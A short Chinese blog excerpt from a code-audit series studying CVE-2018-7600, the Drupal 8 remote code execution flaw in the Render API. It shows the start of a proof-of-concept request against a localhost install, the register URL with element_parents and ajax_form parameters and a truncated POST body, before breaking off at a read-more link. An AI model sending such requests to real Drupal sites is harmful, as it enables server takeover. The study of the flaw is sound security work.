代碼審計之CVE-2018-7600-Drupal遠程代碼執行漏洞-Render API

　　今天學習一下Drupal的另外一個漏洞，因爲渲染數組不當形成的漏洞php 　　poc：html url: http://localhost/drupal-8.5.0/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax post： 'mail[a][#lazy_b

>>阅读原文<<